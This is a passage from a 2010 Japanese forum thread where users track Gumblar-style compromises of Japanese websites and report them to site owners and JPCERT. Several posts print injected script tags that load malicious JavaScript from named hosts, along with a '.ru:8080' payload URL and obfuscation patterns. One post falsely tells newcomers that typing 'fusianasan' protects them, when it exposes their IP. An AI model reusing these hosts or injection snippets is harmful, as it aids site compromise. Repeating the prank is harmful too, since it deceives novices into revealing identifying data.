ところが、実際にはFFが安全だったりするw
使ってれば判る事なんだが、アンチ糞は脳内だから知らないんだよ
591:あんちたった ◆MOTO.0SDfQ
10/06/08 03:13:30
>>588
( ゚Д゚)ハァ?
やられたら安全も糞もねぇ終わり。
どのブラウザも同じでしょ?
どのブラウザでもやられないようにすることが大事。
拾い食いして毒食べても平気な人間が居ないのと一緒。
592:名無しさん@お腹いっぱい。
10/06/08 05:32:40
↓この辺とか未対策だったらどうしようもないよね。
URLリンク(kb2.adobe.com)
593:名無しさん@お腹いっぱい。
10/06/08 05:55:30
OSが窓ならなw
594:593
10/06/08 06:04:10
ごめんスレ違い
595:名無しさん@お腹いっぱい。
10/06/08 06:46:28
まぁFFと書く >>590 みたいなのは火狐厨の中でも
特別に低能な情弱なんだけどね
596:名無しさん@お腹いっぱい。
10/06/08 07:02:10
>>590
FFって馬鹿じゃねーの
597:名無しさん@お腹いっぱい。
10/06/08 07:10:42
保護モード下のIEやWindowsのChromeは、レンダリングは権限の低い別プロセスで行うから、
ブラウザがセキュリティーホールでやられたとしても、さらにOSのセキュリティーホールまで
やられない限り影響をうけない
もちろん、レンダリングと同じプロセスで動くプラグインにセキュリティーホールがあってやられたとしても同様
プロセスがやられたらおしまいな火狐とは違う
598:名無しさん@お腹いっぱい。
10/06/08 07:48:33
まあそういうのにこだわってる奴ほど引っかかるんだけどな…
599:名無しさん@お腹いっぱい。
10/06/08 08:24:14
あほか
普通に使ってればこだわり以前にFxだわ
悔し紛れに恥の上塗りかよ
600:名無しさん@お腹いっぱい。
10/06/08 08:25:19
FF君は引っかかりそうだなw
601:名無しさん@お腹いっぱい。
10/06/08 09:46:17
おまいらブラウザの話になるとすぐ沸騰するのなw
このスレ的には「>>4をやっておけばおk」なんだから
ブラウザがどうのこうのって話は他でやってくれ
602:名無しさん@お腹いっぱい。
10/06/08 09:59:34
取扱注意
berkeleyhouse●co●jp
英会話の前にパソコンインストールしなおしたほうが良いね
603:名無しさん@お腹いっぱい。
10/06/08 10:19:38
[adlib's Blog: 無料で始めるサイト改ざんチェックサービス「サイトミハル(SITEMIHARU)」を開始しました。]2010年2月8日月曜日
■有料版:2万円(税別)/月
URLリンク(blog.adlibjapan.jp)
これ誤判定でしょ?
URLリンク(blog.sitemiharu.com)
URLリンク(blog.sitemiharu.com)
604:名無しさん@お腹いっぱい。
10/06/08 10:49:54
san●ron5●com/gbc
またデジロックかぁ
通報しても落ちないんだろうな
605:名無しさん@お腹いっぱい。
10/06/08 11:32:56
>>601
「~使ってる俺一番優秀、それ以外の奴はゴミ」って優越感に浸りたい奴の荒らし目的だから触る人がいる限りどうしようもないね
ここID出ないし、かといって初心者板にはガンブラー関連のスレないし
テンプレ偽造で踏ませるとか犯罪まがいも起こるしマジPC初心者には地獄
606:名無しさん@お腹いっぱい。
10/06/08 13:04:01
dear16●501●jp/deam13/
simple●703●jp/mens
607:名無しさん@お腹いっぱい。
10/06/08 13:30:04
そういえばこれどうなったの?
IEのあらゆるバージョンにローカル・ファイルへの不正アクセスを許す脆弱性
「設計上の基本特性に関わる問題であるため修正は難しい」との見解を示す
URLリンク(www.computerworld.jp)
608:名無しさん@お腹いっぱい。
10/06/08 13:31:22
「~使ってる俺一番優秀、それ以外の奴はゴミ」ってことは汚物Zでもわいたのか?
あれが居着くとアフォ発言が増えてスレが荒廃する。
609:名無しさん@お腹いっぱい。
10/06/08 13:44:39
>>606
以下にリダイレクトされるけどコードが確認できないね
suspended.503.jp/pc.php
610:名無しさん@お腹いっぱい。
10/06/08 14:44:37
>>602
メル凸したらarenaが動いてくれた様です
まだ一部感染していますが、ウイルスの駆除が始まりました
>>606
aguseで引っ掛けると「Pegel.aa」を検出、Gred及びDr.Webでは問題なし
ソースも問題ないですし、.jsなども存在せず…
リダイレクト先がphpとかそういう理由で検出してるとか?
611:名無しさん@お腹いっぱい。
10/06/08 14:54:51
>>606は運営会社が対処したんだと思う
megalodon.jp/2010-0608-1449-01/www.dan.co.uk/viewsource/index.php?url=URLリンク(webcache.googleusercontent.com)●501●jp/deam13/
612:名無しさん@お腹いっぱい。
10/06/08 16:39:04
取扱注意
www●nsc-com●co●jp
www●nagatan●co●jp
同じサーバ上で同じように改ざんされてるとは…。
コンテンツ管理者が同じなのか?
613:名無しさん@お腹いっぱい。
10/06/08 18:17:20
>>603
指定されたメールアドレスに結果が送信されるます。
日本語が不自由な・・・
614:コテハン ◆8080adndqg
10/06/08 18:26:24
【陥落サイトのURL悪用厳禁】
一件だけ投下・・
www●saiwai-estate●net ←なんか変ww
615:名無しさん@お腹いっぱい。
10/06/08 19:56:05
>>614
ページ中にこれを発見!!
reachsaw●ru:8080/meebo-com/google●com/monster●com●php
悪用禁止!!
616:名無しさん@お腹いっぱい。
10/06/09 00:05:42
>>601
その4の対策やっても、Flashの0-dayとかやられるじゃん
Flashの0-Day対策するには、別の方法使うしかない
617:名無しさん@お腹いっぱい。
10/06/09 01:36:02
>メル凸したらarenaが動いてくれた様です
…と思ったら.jsひとつ修正して動きなしってどういうことなのorz
なんかダメっぽいのでJPCERTとIPAに通報しました
>>607
Secuniaを見る限りでは其処から進展してないっぽいです
Firefoxにも脆弱性が見つかってるみたいですし、どうしたものか
>>611
なるほど、そういうことでしたか
しかしaguseはここのところおかしな事続き
>>612
JPCERTに通報、反応待ち
>>614
メル凸済み、反応待ち
618:名無しさん@お腹いっぱい。
10/06/09 03:59:56
>>607
www.microsoft.com/technet/security/bulletin/ms10-035.mspx
619:名無しさん@お腹いっぱい。
10/06/09 11:32:49
取扱注意
www●enzou●jp
620:名無しさん@お腹いっぱい。
10/06/09 12:08:10
amyou●net/pet/ ←デジロック
www●ad-jeaayf●com/links/ ←デジロック
621:名無しさん@お腹いっぱい。
10/06/09 13:12:28
www●ktm-ktm●com/tomoko/
622:名無しさん@お腹いっぱい。
10/06/09 13:19:38
dida●mbsrv●jp
623:コテハン ◆8080adndqg
10/06/09 14:46:48
【陥落サイトのURL悪用厳禁】
www●ekinavi●sakura●ne●jp/diet/
www●kamituji1●com/
www●bbfactory●jp/ ←絶賛放置中(再掲載)
stromstein●fc2web●com/
624:名無しさん@お腹いっぱい。
10/06/09 14:55:10
取扱注意
yasubei●net
625:コテハン ◆8080adndqg
10/06/09 18:39:34
【陥落サイトのURL悪用厳禁】
seikon●nes3●com
www4●atpages●jp/kessan/
掘れば掘るほど出てくる・・orz
626:名無しさん@お腹いっぱい。
10/06/09 19:54:16
山形蕎麦と炙りの焔蔵様
感染の告知は無しでしょうか・・・
グーグルで検索しているお客様は逃げていきますョ
627:名無しさん@お腹いっぱい。
10/06/09 21:06:13
googleの対応は早くてありがたいな
まぁどんどんプログラムの亜種が出てるから「全部感知!」には至ってないけど……
628:名無しさん@お腹いっぱい。
10/06/09 23:01:17
>>626
なぜ?
629:名無しさん@お腹いっぱい。
10/06/10 01:26:54
>>628
キャッシュに改ざんの刻印がある
webcache●googleusercontent●com/search?q=cache:sWB9ZGzluRsJ:www.enzou●jp/
630:名無しさん@お腹いっぱい。
10/06/10 01:47:39
>>602がGREDの解析対象外になっとるwww
631:名無しさん@お腹いっぱい。
10/06/10 04:22:43
って、あれ?
何を検索しても解析対象外になる…
632:名無しさん@お腹いっぱい。
10/06/10 09:24:12
何が起こってるんだ?
633:名無しさん@お腹いっぱい。
10/06/10 10:44:03
elyess●hotel-prony-elysees-paris●com/ao/5/3/
634:名無しさん@お腹いっぱい。
10/06/10 11:18:44
>>602の英会話スクール
ひっそり修正ですかね
635:コテハン ◆8080adndqg
10/06/10 18:15:47
【陥落サイトのURL悪用厳禁】
※8080じゃないやつ
www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html など・・・
www●acl-music●jp/ ←再掲載(改竄されすぎて絶賛崩壊中)
www●minatomo●jp/cart/CreProduct●php ←放置したまま逃げた?
iiji●biz/hirameki/
demchik●100free●com/3●html
636:名無しさん@お腹いっぱい。
10/06/10 19:12:06
あ、Gred直った
これでやっと凸先のチェックが出来る…さて頑張りますか
>>619-624
JPCERTに報告しました
「www●ekinavi●sakura●ne●jp/diet/」はnotfoundですか?
>>634
駆除が完了するまでに3回ほどメールで突っ込んでます
おかげさまでもう突っ込む気になれません
ところでさっきからPegel.bc仕込んだhtmlメールが何通も届いて…
637:名無しさん@お腹いっぱい。
10/06/10 20:20:09
www●og●sugiyama-u●ac●jp/itogiku/news/list●html
638:名無しさん@お腹いっぱい。
10/06/10 20:32:30
>>571
皆さんの善意は尊いですが
誰も見ない細々した陥落サイトが、このスレに報告され、
悪用され、被害拡大している可能性も否定できません
他のスレに張られた例↓
スレリンク(sec板)
スレリンク(download板:484番)
スレリンク(download板:705番)
スレリンク(livemarket1板:47番)
スレリンク(livemarket1板:81番)
スレリンク(win板:80番)
スレリンク(news4vip板:48番)
前スレにもありましたが、継続的に悪用してる事例↓もありますし、良い知恵はないでしょうか
スレリンク(sec板:926番)
639:名無しさん@お腹いっぱい。
10/06/10 20:39:39
638荒らし
640:名無しさん@お腹いっぱい。
10/06/10 21:27:11
>>637
便所の落書きに貼ってあるURLを疑いもせず、いきなり踏むほうにも問題がある。
641:名無しさん@お腹いっぱい。
10/06/10 21:55:58
>>612
こっそり修正されていますね
642:名無しさん@お腹いっぱい。
10/06/10 21:57:27
長野鍛工株式会社
魚拓
URLリンク(megalodon.jp)
中野スタンピング株式会社
魚拓
URLリンク(megalodon.jp)
643:名無しさん@お腹いっぱい。
10/06/10 22:17:24
>>638
2chに貼ってあるURLは安易に踏んじゃだめだよ
644:名無しさん@お腹いっぱい。
10/06/10 22:28:32
このスレの住人は、奇特なことに当事者や関係機関に通報までしている
当事者はそれを受けて実際に対応していっている
2ちゃんにしては、えらいまともなスレだと思う
>>638みたいなこと感じたこともない
それに>>638が言ってるのは2ちゃん内でのことでしかない
それに関しては>>640と言える
ウイルス貼るなんて特定の人間だから、自分の時間使って荒らし報告してアク禁に追い込めば?
645:名無しさん@お腹いっぱい。
10/06/10 22:35:56
意味不明
646:名無しさん@お腹いっぱい。
10/06/10 23:19:31
お前に意味不明
647:638
10/06/10 23:32:11
ここは"日本一巨大"な便所の落書きですから
勢いのあるスレでは、まとめサイト含めてページビューは万いきますよね
「安易に踏むのがダメ」で片付けるのはどうなんでしょう
サイト改竄がこれだけあるんですから、一般感染者は数百倍あるかも
前からノートントラップやブラクラスレのURLが悪用されてましたが
Gumblarは性質が悪いです
ここやブラクラスレで張られたURLを含む投稿を
自動的に受け付けないようにできればいいと思ったんですが
自分も時々感染サイトに報告してますし
このスレのみなさんを尊重してますので荒らしとか言わないで
648:名無しさん@お腹いっぱい。
10/06/10 23:35:23
>>647
ここはそういうとこじゃないでしょ
他の掲示板ならともかくURL安易に踏んじゃダメってのは2chの基本だよ
649:名無しさん@お腹いっぱい。
10/06/10 23:41:21
▽ 板違いと禁止の投稿
セキュリティ関係以外のソフトの話題は板違い。→ 【 Software板 】へ
Winny関連の話題は板違い。→ 【 Download板 】へ
不正アクセスの方法、パスワード・暗号解析など、攻撃方法の話題は禁止です。
荒らし依頼は全ての板で禁止です。
禁止内容の書き込みを発見したら【 削除依頼 】をお願いします。
650:名無しさん@お腹いっぱい。
10/06/10 23:58:49
>>644
検体拾って提出して、検出率アップにも貢献してるよ
651:638
10/06/11 01:22:54
2ちゃんで『リンク安易に踏んじゃダメ』ってのは全く正しいのですが
ここはネット初めて5日以内に辿り着くような巨大掲示板ですから
それを免罪符にするのはどうかと思いますよ
www.kdash.jpやHONDAが改竄されたように
セキュ意識なくても、大手のホームページ担当できるんですから
一般人が引っかかっても責められないです
このスレに感染URLを報告したら
後々責任を持って悪用されていないか調べて削除依頼するというのは
自分も面倒臭いと思います
●皆さんはこのスレに貼られた感染サイトが悪用されて
Gumblar被害の拡大につながっている可能性は"0"だとお思いですか?
スクリプトとかプログラムで自動的に悪用投稿されないような方法が
あると思ったのですが……
652:名無しさん@お腹いっぱい。
10/06/11 01:24:57
悪用してる連中に、その長ったらしい文章で説教して来い
653:名無しさん@お腹いっぱい。
10/06/11 01:34:25
>一般人が引っかかっても責められないです
仕事でやってようが趣味だろうが責められるべき
654:名無しさん@お腹いっぱい。
10/06/11 01:43:18
>>651
自己責任
655:名無しさん@お腹いっぱい。
10/06/11 02:03:58
あちこちに貼って回ってる馬鹿の自演だろ
656:名無しさん@お腹いっぱい。
10/06/11 02:10:09
>>651
↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
■使い方&注意
URLリンク(info.2ch.net)
【タグ使用やリンクはできるの?】
>★ ワンポイント
>リンクの中には、ブラウザクラッシャ(ブラクラ)やPCクラッシャ(コンコン)やエログロ画像等、悪意をこめて貼り付けられたURLがあります。
>被害を未然に防止するためには、むやみにURLをクリックせず、以降の会話の流れやリンク先のソースをブラクラチェッカー等で確認してみてください。
しっかり書いてあるから>>640の通り。以上。
657:名無しさん@お腹いっぱい。
10/06/11 02:56:47
>>651
ネット初めて5日ならリカバリも楽じゃね
勉強代としては安い方かと
658:名無しさん@お腹いっぱい。
10/06/11 05:33:41
www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html
www●acl-music●jp
www●minatomo●jp/cart/CreProduct●php
iiji●biz/hirameki/
demchik●100free●com/3●html
以上JPCERTに報告済み、ねむい
「acl-music」は通報先にちょっと変わったところを混ぜてみました
659:名無しさん@お腹いっぱい。
10/06/11 07:27:04
Adobe Flash Player 10.1.53.64
660:名無しさん@お腹いっぱい。
10/06/11 08:17:57
getPlusのオマケつきだよ!
661:名無しさん@お腹いっぱい。
10/06/11 09:21:42
またgetplusか
まぁどうせコンパネで消すけど……
それにしても出現からもうすぐ一年経つのに「クリーンインストール」っていう最終手段しか感染した場合の対処法の無いヤツも珍しい
スレで報告されてるのが全部じゃないだろうし、いつになったら決着付くのかねぇ
662:名無しさん@お腹いっぱい。
10/06/11 09:45:29
IE版のFlashのオフラインインストーラー版がほしいときは、FirefoxでFlashダウンロードページにアクセスして
他のブラウザ用を選んでIEを選択すれば大丈夫
それだとgetplus不用でgoogleちゃんもついてないオフライン版をゲットできる
ただし、オフライン版は、更新がAdobe DLM版よりおそく、DLM版公開後1日~数日後になったりする
663:名無しさん@お腹いっぱい。
10/06/11 09:47:03
Adobe Flash Player 10.1.53.64
URLリンク(fpdownload.adobe.com)
URLリンク(fpdownload.adobe.com)
URLリンク(download.macromedia.com)
直リン
664:名無しさん@お腹いっぱい。
10/06/11 11:12:08
取扱注意
www●maple-k●com
665:名無しさん@お腹いっぱい。
10/06/11 11:34:27
>>663
URLリンク(dreamweavermx2.biz)
Player のバージョンが10.0.45.2なのと更新日:2010年2月12日というのはなんとかならんのかw
666:名無しさん@お腹いっぱい。
10/06/11 12:16:46
>>665
え?
667:名無しさん@お腹いっぱい。
10/06/11 12:48:12
この現状を見ると、デジタル証明書の存在が無意味じゃないか
668:名無しさん@お腹いっぱい。
10/06/11 12:59:52
>>663
. ィ
._ .......、._ _ /:/l!
:~""''.>゙' "~ ,、、''‐'、| _
゙、'、::::::ノ:::::::_,.-=. _~:、 /_.}'':,
``、/:::::::::__....,._ `゙'Y' _.ェ-、....._ /_゙''i゙ノ、ノ またまたご冗談を
,.--l‐''"~..-_'.x-='"゙ー 、`'-、 ,:' ノ゙ノブ
" .!-'",/ `'-‐'') /\ `/ でノ-〈
.-''~ >'゙:: ‐'"゙./ ヽ.,' ~ /
//::::: ', / ,:'゙
669:名無しさん@お腹いっぱい。
10/06/11 13:00:10
( ゚,_ゝ゚)バカジャネーノ
670:名無しさん@お腹いっぱい。
10/06/11 13:13:50
>>668
またまたご冗談をw AA略
671:名無しさん@お腹いっぱい。
10/06/11 13:50:47
www●pasar-party●com
672:名無しさん@お腹いっぱい。
10/06/11 14:42:45
取扱注意
www●movecafe●com
673:名無しさん@お腹いっぱい。
10/06/11 14:57:18
>>664
>>671
メル凸済み、反応待ち
674:名無しさん@お腹いっぱい。
10/06/11 14:57:25
URLリンク(www.adobe.com)
あれ?
675:名無しさん@お腹いっぱい。
10/06/11 15:10:35
>>672
メル凸済み、反応待ち
676:名無しさん@お腹いっぱい。
10/06/11 16:44:06
例によってFlashは少し様子見るか…
677:名無しさん@お腹いっぱい。
10/06/11 16:48:17
OS再起動したらgetPlusだけ消えてる
どうなってんだ
678:名無しさん@お腹いっぱい。
10/06/11 17:04:55
>>672
Gred、Dr.Webともに反応せず
お手隙の方、精査よろしくです
679:名無しさん@お腹いっぱい。
10/06/11 17:47:23
>>672
確認できないけど
680:名無しさん@お腹いっぱい。
10/06/11 18:30:35
URLリンク(uproda.2ch-library.com)
変なエロサイトみて適当にクリックしてたら三分おきに↑の画像が表示されるようになったんだけど解決策ありませんか? 正直うっとおしいです・・・
681:名無しさん@お腹いっぱい。
10/06/11 18:32:41
「変な」とわかっていてなおかつリンク先を踏んだあなたが悪い
・・・じゃなくてスレ違い
682:名無しさん@お腹いっぱい。
10/06/11 18:40:58
こういう相談って
他人事みたいな口ぶりが多いよね
683:コテハン ◆8080adndqg
10/06/11 18:42:51
【陥落サイトのURL悪用厳禁】
www●hd-cre●com/bj-fh ←eval(base64_decode・・ なんだこれ?
※www●hd-cre●com/より下の階層はたぶん全滅
www●saiwai-estate●net ←再掲載(絶賛放置中)
blog●mensura-zoili●com/archives/2
seikon●nes3●com
凸してくれてる人>乙です
684:680
10/06/11 19:13:20
URLリンク(www.ad-theater.com)
ちなみにサイトはココです
685:名無しさん@お腹いっぱい。
10/06/11 19:39:16
>>638
2ちゃんねる初心者ですか?
書き込む前にSG(セキュリティー・ガード)に登録しないと危険ですよ。
SGに登録せずに書き込んだ場合、
あなたのパソコンがGumblarに感染させられる恐れがあります。
初期の頃から2ちゃんねるにいる方達はかなりのスキルとこのBBSのコマンドを知っています
ですから簡単にあなたの個人情報等を抜かれ、Googleストリートビューで自宅まで公開された人も数多くおり
社会的に抹殺されてしまう。それが2ちゃんねるの隠れた素顔でもあります
SGしておけばまず実行される.ru:8080自体が無効になってしまうので
どんな凄腕ハッカーでもでも罠URLを踏ませる事ができなくなります
SGに登録する方法は、名前欄に「 fusianasan 」と入れる。
これでSGの登録は完了します
一度登録すれば、ブラウザを閉じない限り継続されます。
2ちゃんねるはルールさえ守れば危険な場所ではありません。
しかし悪意を持った人間も確かに存在します。気を付けて下さいね。
fusianasanは、正式にはフュージャネイザン、
又はフュジャネイザンと読みます。
元々はアメリカの学生達の間で、チャットの時に
セキュリティを強化する為に開発されたシステムです。
fusianasanを掲示板に組み込むのは結構面倒なのですが、
2ちゃんにカキコしてたらウィルスに感染したとか、
個人情報が漏れた等の抗議がうざったくなったひろゆきが、
仕方なく導入しました。
悪意のある人間にクラックされる前にSGを施す事をお勧めします。
686:名無しさん@お腹いっぱい。
10/06/11 19:45:04
>>683
user1.matsumoto.ne.jp/~goma/js/base64.html
>>685
そのIP暴露方法、まだ有効だったのかw
687:名無しさん@お腹いっぱい。
10/06/11 19:50:04
>>680>>684
いわゆるサイト改竄ではないのでスレチ
鑑定スレに行け
688:コテハン ◆8080adndqg
10/06/11 20:04:48
>>686
出先から電話だけで掘ってたからデコードできんかったorz
689:59.106.108.43
10/06/11 20:24:00
>>685
代行でGumblarリンク張る奴もいるからね
スレリンク(operatex板:366番)
スレリンク(siberia板:410番)
スレリンク(morningcoffee板:744番)
Gumbla拡散に利用されて平気なの?
690:名無しさん@お腹いっぱい。
10/06/11 20:53:51
Flash Player更新したがNOSって名前のフォルダが出来てる・・・
コンパネで消した方がいい?
691:名無しさん@お腹いっぱい。
10/06/11 21:06:11
shabao●com/public_html/
692:名無しさん@お腹いっぱい。
10/06/11 22:32:55
>>684
ここ見たらいいんじゃね
URLリンク(wiki)●higaitaisaku●com/wiki.cgi?page=%B0%AD%BC%C1%A5%EF%A5%F3%A5%AF%A5%EA%A5%C3%A5%AF%BA%BE%B5%BD%A5%B5%A5%A4%A5%C8%A4%CE%A5%B9%A5%D1%A5%A4%A5%A6%A5%A7%A5%A2
693:名無しさん@お腹いっぱい。
10/06/11 22:51:11
>>690
気にする必要ないと思われ
694:名無しさん@お腹いっぱい。
10/06/11 22:54:49
>>690
おれもそのファイルできてたけど
中に誰もいませんよ
695:名無しさん@お腹いっぱい。
10/06/12 01:02:42
URLリンク(www.macromedia.com)
いつのまにFlashにP2P機能がついたんだよ
696:名無しさん@お腹いっぱい。
10/06/12 02:09:20
【感染が確認された大手企業一部】
・JR東日本 ・ホンダ ・ローソン ・京王電鉄 ・小林製薬 ・ハウス食品
・ラジオ関西 ・洋菓子販売のモロゾフ など多数
697:fusianasam
10/06/12 08:39:17
test
698:名無しさん@お腹いっぱい。
10/06/12 11:25:06
>>695
去年の9月くらいに気がついたんだけど
yimg.jpとかのFLASHでUPnPにアクセスしてたわ
今までは勝手にルーターのポート開放してたのか
699:名無しさん@お腹いっぱい。
10/06/12 14:29:01
これってFireFox のオプションの詳細、一般の中のアクセシビリティの
Web ページの自動転送、再読み込み禁止で警告させることは
出来ないのでしょうか
700:名無しさん@お腹いっぱい。
10/06/12 15:42:00
>>680
URLリンク(blog.trendmicro.co.jp)
701:名無しさん@お腹いっぱい。
10/06/12 16:11:38
22 名前:(○口○*)さん 投稿日:10/06/12 15:43 ID:h5XAfxXp0
kazoeru■com
誤爆すんなksg
702:名無しさん@お腹いっぱい。
10/06/12 16:24:38
ただでさえバグが多いFlash、いままではネットマーク周りはブラウザ依存だったからよかったものの、
P2P機能がついたりストリーミング機能ついたりして直接ネットワークアクセスなんてされたら、
どんなバグが潜んでるかかわからん
703:名無しさん@お腹いっぱい。
10/06/12 17:18:40
>>695
なにそれこわい…
>>701
URLリンク(www.virustotal.com)
AviraとKasperskyに検体を提出、返事待ち
704:名無しさん@お腹いっぱい。
10/06/12 17:37:38
>>702
しかも更新はせざるを得ない、しかし更新してもP2Pでポートに穴開けられる
どっちに進んでもPC詳しくない一般人には地獄だなコレ
705:名無しさん@お腹いっぱい。
10/06/12 17:40:33
>>695のパネルで「常に拒否」にしたんだけど、それでOK?今後も何かしないと
穴開けられる可能性あるのかな。
706:名無しさん@お腹いっぱい。
10/06/12 17:55:34
いっそflashplayerをアンインスコするのも手だと思うんだ
多少不便にはなるかもしれないがセキュリティにはかえられない
707:コテハン ◆8080adndqg
10/06/12 18:05:06
【陥落サイトのURL悪用厳禁】
www3●pf-x●net/~lau ←絶賛放置中
8080のコードがぶった斬られて
<script type="text/javascript" src="http~中略~.js"></script>
なんだこれ?
www●creativeholic●sakura●ne●jp/creativeholic/ ←web屋 カスがw
ここにも<script type="text/javascript" src="http~中略~.js"></script>
houritusoudan●net/
やっぱり<script type="text/javascript" src="http~中略~.js"></script>が入ってる
708:コテハン ◆8080adndqg
10/06/12 18:10:13
連投スマソ
【陥落サイトのURL悪用厳禁】
www●aoyamabc-online●com/
↓
</html>
<script type="text/javascript" src="http~中略~.js"></script>
<!--06f0d0ddde5fbe2387a6bdb4452f234a-->
8080がコードを変更した可能性あり。
709:コテハン ◆8080adndqg
10/06/12 18:34:37
【陥落サイトのURL悪用厳禁】
www●hekimen-ryokuka●com/rss/index●php ←今までのやつ
www●7500zei●com/ ←例のHP更新代行業者
↓
</html>
<script type="text/javascript" src="http~中略~.js"></script>
<!--d2392c04537c5eaf61fe86d1998535a1-->
katusika●net/base/
↓
<script type="text/javascript" src="http~中略~.js"></script>
<!--7e388d5d98d4fbb4bc9eb21bd27c9815-->
710:名無しさん@お腹いっぱい。
10/06/12 18:49:19
>>706
利便性と両立できないようなセキュリティ対策はゴミだよ。
711:名無しさん@お腹いっぱい。
10/06/12 19:12:49
llife●sakura●ne●jp/fubo/kyuusyuukonnkatu/
712:コテハン ◆8080adndqg
10/06/12 20:03:21
【陥落サイトのURL悪用厳禁】
新型8080(?)っぽいやつ
<script type="text/javascript" src="http~中略~.js"></script>
<!--32文字の英数字-->
↓
canyonhardware●com
d-pic●net/repo/index●html ←絶賛放置中のとこ
電話用のサイトだが・・・
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392
コードがHEXされとるのがあった
713:名無しさん@お腹いっぱい。
10/06/12 20:37:30
>>710
動画サイト見ないやつはべつにいいだろ
714:コテハン ◆8080adndqg
10/06/12 20:57:42
>712
訂正
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392F
末尾のFが脱落してたorz
715:名無しさん@お腹いっぱい。
10/06/12 23:34:16
>>713
コンテンツをフラッシュ内リンクでしか表示しないクソサイトも結構多いんだ。
見なくて済むなら即Uターンなんだが、施設の予約とかどうしようもなかったり、
特にウェザーニューズがな…。
716:あんちたった ◆MOTO.0SDfQ
10/06/13 00:10:09
>>715
アレのウザさは半端無いよね。
HTML版も作れや!って感じだよね
717:名無しさん@お腹いっぱい。
10/06/13 01:49:01
acl-musicのURLをGredで覗いて大爆笑w
あそこは色々な意味で期待を裏切りません
いろいろ忙しくて報告が遅れちゃったので詳細は端折りますけど、
>>701-714までにあるURLは報告済みの反応待ち
これからチェックしようと思ったんですが、Gredがちょっとご機嫌斜め
うまくいかないもんですねえ…
718:コテハン ◆8080adndqg
10/06/13 04:09:23
>>717 乙乙
【陥落サイトのURL悪用厳禁】
tw13●net/vogue/S-MX/index●html ←相変わらず絶賛放置中
8080のコードが途中でぶった斬られて
↓
<script type="text/javascript" src="http://blog●bigsophieblog●com/OCR●js"></script>
<!--b8bc4160235ef97212335c7af60aeda7-->
houritusoudan●net/
↓
<script type="text/javascript" src="http://blog●bigsophieblog●com/Finder●js"></script>
<!--3edc66f8132dfa1d633ac8c343d2e74e-->
謎の新型の飛び先は
blog●bigsophieblog●com/~.js
sogpaoiy●the-mlmpowercall●com/~.js
この2つに集中してるみたい(現時点では)
お馴染みの激しい難読化されたやつ
shabao●com/public_html/top_footer ←既出だったかな?
www●saihu-shop●com/rss/index●php
あきた(から)ねる・・
719:名無しさん@お腹いっぱい。
10/06/13 16:30:21
ここの人たちって
どうやって感染サイト探してるの?
虱潰し?
とにかくすごいね
720:名無しさん@お腹いっぱい。
10/06/13 16:38:49
コードで検索
721:名無しさん@お腹いっぱい。
10/06/13 16:43:16
>>720
なるほど
722:名無しさん@お腹いっぱい。
10/06/13 16:45:56
「Adobe AIR 2」正式版公開、高速化やOSとの連携強化、セキュリティ修正も
URLリンク(internet.watch.impress.co.jp)
これはAdobe AIRにもFlashゼロデイ攻撃の脆弱性が含まれてたということだよな
723:名無しさん@お腹いっぱい。
10/06/13 17:00:08
アドビは本当にやる気無いな
ゼロデイ状態でも一月くらい平気で待たすし
724:名無しさん@お腹いっぱい。
10/06/13 17:33:35
document.write('<s'+'cript type="text/javascript" src="[URL]"></scr'+'ipt>');
さっそく弄ってきたw
725:名無しさん@お腹いっぱい。
10/06/13 17:35:27
>>718
新型avast!反応しないね(´・ω・`)
726:名無しさん@お腹いっぱい。
10/06/13 17:48:45
というか.jsの中身がcom:8080だと今更気付いた
727:名無しさん@お腹いっぱい。
10/06/13 18:38:48
>>725
新型はリダイレクト先が
blog●bigsophieblog●com/
sogpaoiy●the-mlmpowercall●com/
この2つに集約されてるから、hostsファイルで簡単に蹴れる
ドメインが増えたら抜けちゃうけどなw
728:名無しさん@お腹いっぱい。
10/06/13 20:40:59
>>723
市場独占してるからってふんぞり返って
世界に流通してるソフトのセキュリティを疎かにするってのは
世界中にウイルスを広がらせて打撃を与えてるってのと同義なのにね
ウイルスばらまく連中と大差ない、むしろ一般人にはクリーンを装ってる分それ以上か
729:名無しさん@お腹いっぱい。
10/06/13 21:05:50
アメリカ人が損賠請求しないかな
730:名無しさん@お腹いっぱい。
10/06/13 23:57:20
スレリンク(hiphop板:536番)
スレリンク(campus板:105番)
スレリンク(cchara板:877番)
スレリンク(wcomic板:521番)
スレリンク(soccer板:701番)
スレリンク(sec板:571番)
スレリンク(nhk板:51番)
↑悪用が収まらないので感染中のURL晒すのは止めたらいかがですか?
ウイルスばらまく連中に利用されてるように思います
731:名無しさん@お腹いっぱい。
10/06/14 00:16:26
2chで外部URLがあったらブラクラ・ウイルスだと思ってください
そして、このスレはちゃんと鯖管に通報したりしてますよね
>>730のリンクのスレにこのスレのリンクを貼って
対策を促せばいいんじゃないでしょうか
732:名無しさん@お腹いっぱい。
10/06/14 00:48:39
>>730
「自己責任」という言葉はご存知無いのでしょうかネ?
>>656が書いてるように、2ちゃんねるの使い方&注意 URLリンク(info.2ch.net) には
>被害を未然に防止するためには、むやみにURLをクリックせず (中略) 転んでも泣かない。。。
貼ってあるURLを疑いもせず、いきなり踏むほうにも問題があります。
>>640も書いてますね。
取説をしっかり読んでから文句を言って下さい。
踏まされて悔しかったら、涙を拭いて…クリーンインストール後に>>4を実施しましょう。
因みに、URLリンク(gw.aguse.jp) を通せば、何が仕掛けられていてもPCには影響が無いので覚えておいて下さい。
aguseはブックマーク推奨ですよ。
733:名無しさん@お腹いっぱい。
10/06/14 01:43:23
>>730
つ「鏡」
734:名無しさん@お腹いっぱい。
10/06/14 13:12:03
昔から提示されたURLホイホイ踏むのはアホのやる事って言われてたしな
踏むものがブラクラからウイルスに変わっただけ
735:名無しさん@お腹いっぱい。
10/06/14 13:58:57
www●maizurusou●co●jp/equip/index●html
だが、SonicWallのゲートウェイAVがGumlar_7として反応する。
しかし、ソースをみてもそれらしきものがみあたらん。
ちなみにウイルスバスターも反応しない。
SonicWall抜きでアクセスしても飛ばされた様子もない。
やられてますかね?
736:名無しさん@お腹いっぱい。
10/06/14 14:06:36
どこに目を付けてんだ
フレームしか無いシンプルなトップにおもいっきりあるじゃんか
737:735
10/06/14 14:21:02
>>736
ありがとう。逝ってきます・・
一応電凸しておいた。
「またでいすか?」という反応だった。
738:名無しさん@お腹いっぱい。
10/06/14 19:00:57
●com:8080キター
www●yosegi●jp
